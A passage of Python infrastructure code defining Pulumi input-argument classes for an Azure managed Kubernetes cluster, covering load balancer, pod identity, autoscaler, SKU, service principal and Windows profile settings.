        # Default an omitted/None count to 1 (the documented default), then
        # store unconditionally: after defaulting, ``count`` can no longer be
        # None, so the generated ``if count is not None`` re-check was
        # redundant and has been removed. Behavior is unchanged.
        if count is None:
            count = 1
        pulumi.set(__self__, "count", count)
    @property
    @pulumi.getter
    def count(self) -> Optional[pulumi.Input[int]]:
        """
        Desired number of outbound IP created/managed by Azure for the cluster load balancer. Allowed values must be in the range of 1 to 100 (inclusive). The default value is 1.
        """
        return pulumi.get(self, "count")
    @count.setter
    def count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "count", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs:
    # Auto-generated Pulumi input type; the accessor layout is introspected by
    # @pulumi.input_type and must not be restructured by hand.
    def __init__(__self__, *,
                 public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]] = None):
        """
        Desired outbound IP Prefix resources for the cluster load balancer.
        :param pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]] public_ip_prefixes: A list of public IP prefix resources.
        """
        # The value is only recorded when explicitly supplied.
        if public_ip_prefixes is not None:
            pulumi.set(__self__, "public_ip_prefixes", public_ip_prefixes)
    @property
    @pulumi.getter(name="publicIPPrefixes")
    def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:
        """
        A list of public IP prefix resources.
        """
        return pulumi.get(self, "public_ip_prefixes")
    @public_ip_prefixes.setter
    def public_ip_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]):
        pulumi.set(self, "public_ip_prefixes", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileOutboundIPsArgs:
    # Auto-generated Pulumi input type; the accessor layout is introspected by
    # @pulumi.input_type and must not be restructured by hand.
    def __init__(__self__, *,
                 public_ips: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]] = None):
        """
        Desired outbound IP resources for the cluster load balancer.
        :param pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]] public_ips: A list of public IP resources.
        """
        # The value is only recorded when explicitly supplied.
        if public_ips is not None:
            pulumi.set(__self__, "public_ips", public_ips)
    @property
    @pulumi.getter(name="publicIPs")
    def public_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:
        """
        A list of public IP resources.
        """
        return pulumi.get(self, "public_ips")
    @public_ips.setter
    def public_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]):
        pulumi.set(self, "public_ips", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileArgs:
    def __init__(__self__, *,
                 allocated_outbound_ports: Optional[pulumi.Input[int]] = None,
                 effective_outbound_ips: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]] = None,
                 idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
                 managed_outbound_ips: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs']] = None,
                 outbound_ip_prefixes: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs']] = None,
                 outbound_ips: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs']] = None):
        """
        Profile of the managed cluster load balancer.
        :param pulumi.Input[int] allocated_outbound_ports: Desired number of allocated SNAT ports per VM. Allowed values must be in the range of 0 to 64000 (inclusive). The default value is 0 which results in Azure dynamically allocating ports.
        :param pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]] effective_outbound_ips: The effective outbound IP resources of the cluster load balancer.
        :param pulumi.Input[int] idle_timeout_in_minutes: Desired outbound flow idle timeout in minutes. Allowed values must be in the range of 4 to 120 (inclusive). The default value is 30 minutes.
        :param pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs'] managed_outbound_ips: Desired managed outbound IPs for the cluster load balancer.
        :param pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs'] outbound_ip_prefixes: Desired outbound IP Prefix resources for the cluster load balancer.
        :param pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs'] outbound_ips: Desired outbound IP resources for the cluster load balancer.
        """
        # Defaulted fields can no longer be None after defaulting, so the
        # original's follow-up `is not None` guard was dead code; set directly.
        if allocated_outbound_ports is None:
            allocated_outbound_ports = 0
        pulumi.set(__self__, "allocated_outbound_ports", allocated_outbound_ports)
        if effective_outbound_ips is not None:
            pulumi.set(__self__, "effective_outbound_ips", effective_outbound_ips)
        if idle_timeout_in_minutes is None:
            idle_timeout_in_minutes = 30
        pulumi.set(__self__, "idle_timeout_in_minutes", idle_timeout_in_minutes)
        if managed_outbound_ips is not None:
            pulumi.set(__self__, "managed_outbound_ips", managed_outbound_ips)
        if outbound_ip_prefixes is not None:
            pulumi.set(__self__, "outbound_ip_prefixes", outbound_ip_prefixes)
        if outbound_ips is not None:
            pulumi.set(__self__, "outbound_ips", outbound_ips)

    @property
    @pulumi.getter(name="allocatedOutboundPorts")
    def allocated_outbound_ports(self) -> Optional[pulumi.Input[int]]:
        """
        Desired number of allocated SNAT ports per VM. Allowed values must be in the range of 0 to 64000 (inclusive). The default value is 0 which results in Azure dynamically allocating ports.
        """
        return pulumi.get(self, "allocated_outbound_ports")

    @allocated_outbound_ports.setter
    def allocated_outbound_ports(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "allocated_outbound_ports", value)

    @property
    @pulumi.getter(name="effectiveOutboundIPs")
    def effective_outbound_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:
        """
        The effective outbound IP resources of the cluster load balancer.
        """
        return pulumi.get(self, "effective_outbound_ips")

    @effective_outbound_ips.setter
    def effective_outbound_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]):
        pulumi.set(self, "effective_outbound_ips", value)

    @property
    @pulumi.getter(name="idleTimeoutInMinutes")
    def idle_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        Desired outbound flow idle timeout in minutes. Allowed values must be in the range of 4 to 120 (inclusive). The default value is 30 minutes.
        """
        return pulumi.get(self, "idle_timeout_in_minutes")

    @idle_timeout_in_minutes.setter
    def idle_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "idle_timeout_in_minutes", value)

    @property
    @pulumi.getter(name="managedOutboundIPs")
    def managed_outbound_ips(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs']]:
        """
        Desired managed outbound IPs for the cluster load balancer.
        """
        return pulumi.get(self, "managed_outbound_ips")

    @managed_outbound_ips.setter
    def managed_outbound_ips(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs']]):
        pulumi.set(self, "managed_outbound_ips", value)

    @property
    @pulumi.getter(name="outboundIPPrefixes")
    def outbound_ip_prefixes(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs']]:
        """
        Desired outbound IP Prefix resources for the cluster load balancer.
        """
        return pulumi.get(self, "outbound_ip_prefixes")

    @outbound_ip_prefixes.setter
    def outbound_ip_prefixes(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs']]):
        pulumi.set(self, "outbound_ip_prefixes", value)

    @property
    @pulumi.getter(name="outboundIPs")
    def outbound_ips(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs']]:
        """
        Desired outbound IP resources for the cluster load balancer.
        """
        return pulumi.get(self, "outbound_ips")

    @outbound_ips.setter
    def outbound_ips(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs']]):
        pulumi.set(self, "outbound_ips", value)
@pulumi.input_type
class ManagedClusterPodIdentityExceptionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 pod_labels: pulumi.Input[Mapping[str, pulumi.Input[str]]]):
        """
        :param pulumi.Input[str] name: Name of the pod identity exception.
        :param pulumi.Input[str] namespace: Namespace of the pod identity exception.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_labels: Pod labels to match.
        """
        # All three fields are required; store them in declaration order.
        for _key, _val in (("name", name),
                           ("namespace", namespace),
                           ("pod_labels", pod_labels)):
            pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The pod identity exception's name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """
        The pod identity exception's namespace.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="podLabels")
    def pod_labels(self) -> pulumi.Input[Mapping[str, pulumi.Input[str]]]:
        """
        The pod labels to match.
        """
        return pulumi.get(self, "pod_labels")

    @pod_labels.setter
    def pod_labels(self, value: pulumi.Input[Mapping[str, pulumi.Input[str]]]):
        pulumi.set(self, "pod_labels", value)
@pulumi.input_type
class ManagedClusterPodIdentityProfileArgs:
    def __init__(__self__, *,
                 allow_network_plugin_kubenet: Optional[pulumi.Input[bool]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 user_assigned_identities: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]]] = None,
                 user_assigned_identity_exceptions: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]]] = None):
        """
        :param pulumi.Input[bool] allow_network_plugin_kubenet: Customer consent for enabling AAD pod identity addon in cluster using Kubenet network plugin.
        :param pulumi.Input[bool] enabled: Whether the pod identity addon is enabled.
        :param pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]] user_assigned_identities: User assigned pod identity settings.
        :param pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]] user_assigned_identity_exceptions: User assigned pod identity exception settings.
        """
        # Every field is optional; only supplied values are recorded.
        for _key, _val in (
                ("allow_network_plugin_kubenet", allow_network_plugin_kubenet),
                ("enabled", enabled),
                ("user_assigned_identities", user_assigned_identities),
                ("user_assigned_identity_exceptions", user_assigned_identity_exceptions)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="allowNetworkPluginKubenet")
    def allow_network_plugin_kubenet(self) -> Optional[pulumi.Input[bool]]:
        """
        Customer consent for enabling the AAD pod identity addon on a cluster that uses the Kubenet network plugin.
        """
        return pulumi.get(self, "allow_network_plugin_kubenet")

    @allow_network_plugin_kubenet.setter
    def allow_network_plugin_kubenet(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "allow_network_plugin_kubenet", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the pod identity addon is enabled.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="userAssignedIdentities")
    def user_assigned_identities(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]]]:
        """
        Settings for the user assigned pod identities.
        """
        return pulumi.get(self, "user_assigned_identities")

    @user_assigned_identities.setter
    def user_assigned_identities(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]]]):
        pulumi.set(self, "user_assigned_identities", value)

    @property
    @pulumi.getter(name="userAssignedIdentityExceptions")
    def user_assigned_identity_exceptions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]]]:
        """
        Settings for the user assigned pod identity exceptions.
        """
        return pulumi.get(self, "user_assigned_identity_exceptions")

    @user_assigned_identity_exceptions.setter
    def user_assigned_identity_exceptions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]]]):
        pulumi.set(self, "user_assigned_identity_exceptions", value)
@pulumi.input_type
class ManagedClusterPodIdentityArgs:
    def __init__(__self__, *,
                 identity: pulumi.Input['UserAssignedIdentityArgs'],
                 name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 binding_selector: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input['UserAssignedIdentityArgs'] identity: Information of the user assigned identity.
        :param pulumi.Input[str] name: Name of the pod identity.
        :param pulumi.Input[str] namespace: Namespace of the pod identity.
        :param pulumi.Input[str] binding_selector: Binding selector to use for the AzureIdentityBinding resource.
        """
        # Required fields are always stored; the selector only when provided.
        for _key, _val in (("identity", identity),
                           ("name", name),
                           ("namespace", namespace)):
            pulumi.set(__self__, _key, _val)
        if binding_selector is not None:
            pulumi.set(__self__, "binding_selector", binding_selector)

    @property
    @pulumi.getter
    def identity(self) -> pulumi.Input['UserAssignedIdentityArgs']:
        """
        The user assigned identity's information.
        """
        return pulumi.get(self, "identity")

    @identity.setter
    def identity(self, value: pulumi.Input['UserAssignedIdentityArgs']):
        pulumi.set(self, "identity", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The pod identity's name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """
        The pod identity's namespace.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="bindingSelector")
    def binding_selector(self) -> Optional[pulumi.Input[str]]:
        """
        The binding selector used for the AzureIdentityBinding resource.
        """
        return pulumi.get(self, "binding_selector")

    @binding_selector.setter
    def binding_selector(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "binding_selector", value)
@pulumi.input_type
class ManagedClusterPropertiesAutoScalerProfileArgs:
    def __init__(__self__, *,
                 balance_similar_node_groups: Optional[pulumi.Input[str]] = None,
                 expander: Optional[pulumi.Input[Union[str, 'Expander']]] = None,
                 max_empty_bulk_delete: Optional[pulumi.Input[str]] = None,
                 max_graceful_termination_sec: Optional[pulumi.Input[str]] = None,
                 max_node_provision_time: Optional[pulumi.Input[str]] = None,
                 max_total_unready_percentage: Optional[pulumi.Input[str]] = None,
                 new_pod_scale_up_delay: Optional[pulumi.Input[str]] = None,
                 ok_total_unready_count: Optional[pulumi.Input[str]] = None,
                 scale_down_delay_after_add: Optional[pulumi.Input[str]] = None,
                 scale_down_delay_after_delete: Optional[pulumi.Input[str]] = None,
                 scale_down_delay_after_failure: Optional[pulumi.Input[str]] = None,
                 scale_down_unneeded_time: Optional[pulumi.Input[str]] = None,
                 scale_down_unready_time: Optional[pulumi.Input[str]] = None,
                 scale_down_utilization_threshold: Optional[pulumi.Input[str]] = None,
                 scan_interval: Optional[pulumi.Input[str]] = None,
                 skip_nodes_with_local_storage: Optional[pulumi.Input[str]] = None,
                 skip_nodes_with_system_pods: Optional[pulumi.Input[str]] = None):
        """
        Parameters applied to the cluster-autoscaler when it is enabled.
        All settings are optional and string-encoded; omitted settings are not stored.
        """
        # Table-driven storage: identical order and None-filtering as the
        # per-field conditionals this replaces.
        _settings = (
            ("balance_similar_node_groups", balance_similar_node_groups),
            ("expander", expander),
            ("max_empty_bulk_delete", max_empty_bulk_delete),
            ("max_graceful_termination_sec", max_graceful_termination_sec),
            ("max_node_provision_time", max_node_provision_time),
            ("max_total_unready_percentage", max_total_unready_percentage),
            ("new_pod_scale_up_delay", new_pod_scale_up_delay),
            ("ok_total_unready_count", ok_total_unready_count),
            ("scale_down_delay_after_add", scale_down_delay_after_add),
            ("scale_down_delay_after_delete", scale_down_delay_after_delete),
            ("scale_down_delay_after_failure", scale_down_delay_after_failure),
            ("scale_down_unneeded_time", scale_down_unneeded_time),
            ("scale_down_unready_time", scale_down_unready_time),
            ("scale_down_utilization_threshold", scale_down_utilization_threshold),
            ("scan_interval", scan_interval),
            ("skip_nodes_with_local_storage", skip_nodes_with_local_storage),
            ("skip_nodes_with_system_pods", skip_nodes_with_system_pods),
        )
        for _key, _val in _settings:
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="balanceSimilarNodeGroups")
    def balance_similar_node_groups(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "balance_similar_node_groups")

    @balance_similar_node_groups.setter
    def balance_similar_node_groups(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "balance_similar_node_groups", value)

    @property
    @pulumi.getter
    def expander(self) -> Optional[pulumi.Input[Union[str, 'Expander']]]:
        return pulumi.get(self, "expander")

    @expander.setter
    def expander(self, value: Optional[pulumi.Input[Union[str, 'Expander']]]):
        pulumi.set(self, "expander", value)

    @property
    @pulumi.getter(name="maxEmptyBulkDelete")
    def max_empty_bulk_delete(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "max_empty_bulk_delete")

    @max_empty_bulk_delete.setter
    def max_empty_bulk_delete(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_empty_bulk_delete", value)

    @property
    @pulumi.getter(name="maxGracefulTerminationSec")
    def max_graceful_termination_sec(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "max_graceful_termination_sec")

    @max_graceful_termination_sec.setter
    def max_graceful_termination_sec(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_graceful_termination_sec", value)

    @property
    @pulumi.getter(name="maxNodeProvisionTime")
    def max_node_provision_time(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "max_node_provision_time")

    @max_node_provision_time.setter
    def max_node_provision_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_node_provision_time", value)

    @property
    @pulumi.getter(name="maxTotalUnreadyPercentage")
    def max_total_unready_percentage(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "max_total_unready_percentage")

    @max_total_unready_percentage.setter
    def max_total_unready_percentage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_total_unready_percentage", value)

    @property
    @pulumi.getter(name="newPodScaleUpDelay")
    def new_pod_scale_up_delay(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "new_pod_scale_up_delay")

    @new_pod_scale_up_delay.setter
    def new_pod_scale_up_delay(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "new_pod_scale_up_delay", value)

    @property
    @pulumi.getter(name="okTotalUnreadyCount")
    def ok_total_unready_count(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "ok_total_unready_count")

    @ok_total_unready_count.setter
    def ok_total_unready_count(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ok_total_unready_count", value)

    @property
    @pulumi.getter(name="scaleDownDelayAfterAdd")
    def scale_down_delay_after_add(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scale_down_delay_after_add")

    @scale_down_delay_after_add.setter
    def scale_down_delay_after_add(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_down_delay_after_add", value)

    @property
    @pulumi.getter(name="scaleDownDelayAfterDelete")
    def scale_down_delay_after_delete(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scale_down_delay_after_delete")

    @scale_down_delay_after_delete.setter
    def scale_down_delay_after_delete(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_down_delay_after_delete", value)

    @property
    @pulumi.getter(name="scaleDownDelayAfterFailure")
    def scale_down_delay_after_failure(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scale_down_delay_after_failure")

    @scale_down_delay_after_failure.setter
    def scale_down_delay_after_failure(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_down_delay_after_failure", value)

    @property
    @pulumi.getter(name="scaleDownUnneededTime")
    def scale_down_unneeded_time(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scale_down_unneeded_time")

    @scale_down_unneeded_time.setter
    def scale_down_unneeded_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_down_unneeded_time", value)

    @property
    @pulumi.getter(name="scaleDownUnreadyTime")
    def scale_down_unready_time(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scale_down_unready_time")

    @scale_down_unready_time.setter
    def scale_down_unready_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_down_unready_time", value)

    @property
    @pulumi.getter(name="scaleDownUtilizationThreshold")
    def scale_down_utilization_threshold(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scale_down_utilization_threshold")

    @scale_down_utilization_threshold.setter
    def scale_down_utilization_threshold(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_down_utilization_threshold", value)

    @property
    @pulumi.getter(name="scanInterval")
    def scan_interval(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scan_interval")

    @scan_interval.setter
    def scan_interval(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scan_interval", value)

    @property
    @pulumi.getter(name="skipNodesWithLocalStorage")
    def skip_nodes_with_local_storage(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "skip_nodes_with_local_storage")

    @skip_nodes_with_local_storage.setter
    def skip_nodes_with_local_storage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "skip_nodes_with_local_storage", value)

    @property
    @pulumi.getter(name="skipNodesWithSystemPods")
    def skip_nodes_with_system_pods(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "skip_nodes_with_system_pods")

    @skip_nodes_with_system_pods.setter
    def skip_nodes_with_system_pods(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "skip_nodes_with_system_pods", value)
@pulumi.input_type
class ManagedClusterPropertiesIdentityProfileArgs:
    def __init__(__self__, *,
                 client_id: Optional[pulumi.Input[str]] = None,
                 object_id: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] client_id: The client id of the user assigned identity.
        :param pulumi.Input[str] object_id: The object id of the user assigned identity.
        :param pulumi.Input[str] resource_id: The resource id of the user assigned identity.
        """
        # All ids are optional; record only those that were provided.
        for _key, _val in (("client_id", client_id),
                           ("object_id", object_id),
                           ("resource_id", resource_id)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> Optional[pulumi.Input[str]]:
        """
        Client id of the user assigned identity.
        """
        return pulumi.get(self, "client_id")

    @client_id.setter
    def client_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_id", value)

    @property
    @pulumi.getter(name="objectId")
    def object_id(self) -> Optional[pulumi.Input[str]]:
        """
        Object id of the user assigned identity.
        """
        return pulumi.get(self, "object_id")

    @object_id.setter
    def object_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "object_id", value)

    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        Resource id of the user assigned identity.
        """
        return pulumi.get(self, "resource_id")

    @resource_id.setter
    def resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_id", value)
@pulumi.input_type
class ManagedClusterSKUArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUName']]] = None,
                 tier: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUTier']]] = None):
        """
        :param pulumi.Input[Union[str, 'ManagedClusterSKUName']] name: Name of a managed cluster SKU.
        :param pulumi.Input[Union[str, 'ManagedClusterSKUTier']] tier: Tier of a managed cluster SKU.
        """
        # Both fields are optional; skip whichever was not supplied.
        for _key, _val in (("name", name), ("tier", tier)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[Union[str, 'ManagedClusterSKUName']]]:
        """
        The managed cluster SKU's name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUName']]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def tier(self) -> Optional[pulumi.Input[Union[str, 'ManagedClusterSKUTier']]]:
        """
        The managed cluster SKU's tier.
        """
        return pulumi.get(self, "tier")

    @tier.setter
    def tier(self, value: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUTier']]]):
        pulumi.set(self, "tier", value)
@pulumi.input_type
class ManagedClusterServicePrincipalProfileArgs:
    def __init__(__self__, *,
                 client_id: pulumi.Input[str],
                 secret: Optional[pulumi.Input[str]] = None):
        """
        Information about a service principal identity for the cluster to use for manipulating Azure APIs.

        :param pulumi.Input[str] client_id: The ID for the service principal.
        :param pulumi.Input[str] secret: The secret password associated with the service principal in plain text.
        """
        pulumi.set(__self__, "client_id", client_id)
        # The secret is optional and is only stored when supplied.
        if secret is None:
            return
        pulumi.set(__self__, "secret", secret)

    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> pulumi.Input[str]:
        """
        The service principal's ID.
        """
        return pulumi.get(self, "client_id")

    @client_id.setter
    def client_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "client_id", value)

    @property
    @pulumi.getter
    def secret(self) -> Optional[pulumi.Input[str]]:
        """
        The plain-text secret password associated with the service principal.
        """
        return pulumi.get(self, "secret")

    @secret.setter
    def secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret", value)
@pulumi.input_type
class ManagedClusterWindowsProfileArgs:
    def __init__(__self__, *,
                 admin_username: pulumi.Input[str],
                 admin_password: Optional[pulumi.Input[str]] = None,
                 enable_csi_proxy: Optional[pulumi.Input[bool]] = None,
                 license_type: Optional[pulumi.Input[Union[str, 'LicenseType']]] = None):
        """
        Profile for Windows VMs in the container service cluster.

        :param pulumi.Input[str] admin_username: Specifies the name of the administrator account. <br><br> **restriction:** Cannot end in "." <br><br> **Disallowed values:** "administrator", "admin", "user", "user1", "test", "user2", "test1", "user3", "admin1", "1", "123", "a", "actuser", "adm", "admin2", "aspnet", "backup", "console", "david", "guest", "john", "owner", "root", "server", "sql", "support", "support_388945a0", "sys", "test2", "test3", "user4", "user5". <br><br> **Minimum-length:** 1 character <br><br> **Max-length:** 20 characters
        :param pulumi.Input[str] admin_password: Specifies the password of the administrator account. <br><br> **Minimum-length:** 8 characters <br><br> **Max-length:** 123 characters <br><br> **Complexity requirements:** 3 out of 4 conditions below need to be fulfilled <br> Has lower characters <br>Has upper characters <br> Has a digit <br> Has a special character (Regex match [\W_]) <br><br> **Disallowed values:** "abc@123", "P@$$w0rd", "P@ssw0rd", "P@ssword123", "Pa$$word", "pass@word1", "Password!", "Password1", "Password22", "iloveyou!"
        :param pulumi.Input[bool] enable_csi_proxy: Whether to enable CSI proxy.
        :param pulumi.Input[Union[str, 'LicenseType']] license_type: The licenseType to use for Windows VMs. Windows_Server is used to enable Azure Hybrid User Benefits for Windows VMs.
        """
        # Username is mandatory; the remaining fields are stored only when set.
        pulumi.set(__self__, "admin_username", admin_username)
        for _key, _val in (("admin_password", admin_password),
                           ("enable_csi_proxy", enable_csi_proxy),
                           ("license_type", license_type)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="adminUsername")
    def admin_username(self) -> pulumi.Input[str]:
        """
        Specifies the name of the administrator account. <br><br> **restriction:** Cannot end in "." <br><br> **Disallowed values:** "administrator", "admin", "user", "user1", "test", "user2", "test1", "user3", "admin1", "1", "123", "a", "actuser", "adm", "admin2", "aspnet", "backup", "console", "david", "guest", "john", "owner", "root", "server", "sql", "support", "support_388945a0", "sys", "test2", "test3", "user4", "user5". <br><br> **Minimum-length:** 1 character <br><br> **Max-length:** 20 characters
        """
        return pulumi.get(self, "admin_username")

    @admin_username.setter
    def admin_username(self, value: pulumi.Input[str]):
        pulumi.set(self, "admin_username", value)

    @property
    @pulumi.getter(name="adminPassword")
    def admin_password(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the password of the administrator account. <br><br> **Minimum-length:** 8 characters <br><br> **Max-length:** 123 characters <br><br> **Complexity requirements:** 3 out of 4 conditions below need to be fulfilled <br> Has lower characters <br>Has upper characters <br> Has a digit <br> Has a special character (Regex match [\W_]) <br><br> **Disallowed values:** "abc@123", "P@$$w0rd", "P@ssw0rd", "P@ssword123", "Pa$$word", "pass@word1", "Password!", "Password1", "Password22", "iloveyou!"
        """
        return pulumi.get(self, "admin_password")

    @admin_password.setter
    def admin_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "admin_password", value)

    @property
    @pulumi.getter(name="enableCSIProxy")
    def enable_csi_proxy(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the CSI proxy is enabled.
        """
        return pulumi.get(self, "enable_csi_proxy")

    @enable_csi_proxy.setter
    def enable_csi_proxy(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_csi_proxy", value)

    @property
    @pulumi.getter(name="licenseType")
    def license_type(self) -> Optional[pulumi.Input[Union[str, 'LicenseType']]]:
        """
        The licenseType to use for Windows VMs. Windows_Server is used to enable Azure Hybrid User Benefits for Windows VMs.
        """
        return pulumi.get(self, "license_type")

    @license_type.setter
    def license_type(self, value: Optional[pulumi.Input[Union[str, 'LicenseType']]]):
        pulumi.set(self, "license_type", value)
@pulumi.input_type
class NetworkProfileArgs:
    def __init__(__self__, *,
                 peer_vnet_id: Optional[pulumi.Input[str]] = None,
                 vnet_cidr: Optional[pulumi.Input[str]] = None,
